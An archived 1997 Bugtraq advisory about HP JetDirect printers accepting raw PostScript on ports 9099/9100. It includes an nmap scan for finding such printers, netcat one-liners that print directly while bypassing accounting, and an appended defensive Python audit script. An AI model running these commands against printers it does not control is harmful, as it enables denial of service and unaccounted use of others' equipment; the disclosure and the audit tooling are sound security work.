JetDirect printer card problem

Summary
Description: The JetDirect card with TCP/IP enabled will by default open high ports (9099 and 9100) which can be used to print arbitrary files
Author: Klaus Steding-Jessen <jessen@AHAND.UNICAMP.BR>
Compromise: DoS Attack (send 500 page documents), or free printing if you have access to the printer in question
Vulnerable Systems: Those using JetDirect with TCP/IP enabled and the default unrestricted connections.
Date: 4 October 1997
Notes: Cool! He used my
Details


Date: Sat, 4 Oct 1997 18:02:01 -0300
From: Klaus Steding-Jessen <jessen@AHAND.UNICAMP.BR>
To: BUGTRAQ@NETSPACE.ORG
Subject: HP Laserjet 4M Plus DirectJet Problem

        I don't know if this is a well-known HP printer problem, but
I've found no references to it in the Bugtraq archives.

        It is possible to bypass lpd and page accounting on an HP
PostScript printer attached to an ethernet card by sending PostScript
directly to tcp ports 9099 and 9100 from any machine over the network.

        I've tested on an HP Laserjet 4M Plus DirectJet, connecting to
port 9099 or 9100 tcp and printing PostScript documents.

        There is no way to tell the printer to accept connections only
from a range of valid IPs.  Also, it is possible to telnet to the
printer and change the printer IP or disable logging.  Protecting the
printer inside a firewall appears to be the only safe way.

        Finding this kind of printer on a network is quite easy with a
good port scanner.  It responds to ping and listens on tcp ports 23,
515, 9099 and 9100.

# nmap -P -s printer.foo.bar.org -p 23,515,9099,9100

Starting nmap V 1.25 by Fyodor (fyodor@nmap.org, www.dhp.com/~fyodor/nmap/
Hint: The -v option notifies you of open ports as they are found.

Host printer.foo.bar.org (xx.yy.ww.zz) appears to be up ... good.
Open ports on printer.foo.bar.org (xx.yy.ww.zz):
Port Number  Protocol  Service
23           tcp        telnet
515          tcp        printer
9099         tcp        unknown
9100         tcp        unknown


        To print a PostScript document just send it to port 9099 or
9100.  Netcat will do:

$ nc printer.foo.bar.org 9099 < huge_document.ps
        or
$ nc printer.foo.bar.org 9100 < huge_document.ps

        Can anyone confirm this with other printers?  I think HP 5M is
also vulnerable, but I've not tested.

Klaus.
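
An added example, not part of the original post or of nmap itself: a check that the firewall mitigation described in the message actually holds. It reads nmap grepable (-oG) output from a scan run from outside the trusted segment and reports every host whose raw-print ports (9099, 9100) are still reachable, noting when telnet is reachable as well. The function names and the sample scan data are constructed for illustration.

```python
import re

# Ports named in the advisory: raw printing on 9099/9100, telnet administration on 23.
RAW_PRINT = {9099, 9100}
TELNET = 23
HOST_RE = re.compile(r"^Host:\s+(\S+)")

def open_tcp_ports(line):
    """Return the set of open TCP ports listed on one grepable (-oG) line."""
    ports = set()
    for field in line.split("\t"):
        if not field.startswith("Ports:"):
            continue
        for entry in field[len("Ports:"):].split(","):
            # Entry layout: port/state/protocol/owner/service/rpcinfo/version/
            parts = entry.strip().split("/")
            if len(parts) >= 3 and parts[0].isdigit() and parts[1:3] == ["open", "tcp"]:
                ports.add(int(parts[0]))
    return ports

def audit(grepable_text):
    """Map each host with reachable raw-print ports to a list of findings."""
    findings = {}
    for line in grepable_text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and anything that is not a host record
        ports = open_tcp_ports(line)
        raw = sorted(ports & RAW_PRINT)
        if not raw:
            continue  # raw-print ports closed or filtered from this vantage point
        notes = [f"raw print port(s) {raw} reachable: jobs can bypass lpd and page accounting"]
        if TELNET in ports:
            notes.append("telnet (23) reachable: printer IP and logging can be changed")
        findings[m.group(1)] = notes
    return findings

# Constructed sample in grepable format; addresses are from a documentation range.
SAMPLE = "\n".join([
    "# Nmap scan initiated (constructed sample)",
    "Host: 192.0.2.10 (printer-a.example.org)\tStatus: Up",
    "Host: 192.0.2.10 (printer-a.example.org)\tPorts: 23/open/tcp//telnet///, 515/open/tcp//printer///, 9099/open/tcp//unknown///, 9100/open/tcp//jetdirect///",
    "Host: 192.0.2.11 (printer-b.example.org)\tPorts: 23/filtered/tcp//telnet///, 515/open/tcp//printer///, 9100/filtered/tcp//jetdirect///",
    "Host: 192.0.2.12 (printer-c.example.org)\tPorts: 23/closed/tcp//telnet///, 9100/open/tcp//jetdirect///\tIgnored State: filtered (2)",
])

if __name__ == "__main__":
    for host, notes in audit(SAMPLE).items():
        print(host, *notes, sep="\n  ")
```

A host that exposes only 515 to the scanning vantage point, like the second sample host, is the intended end state: printing still goes through lpd and its accounting.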

This page is part of Fyodor's exploit world.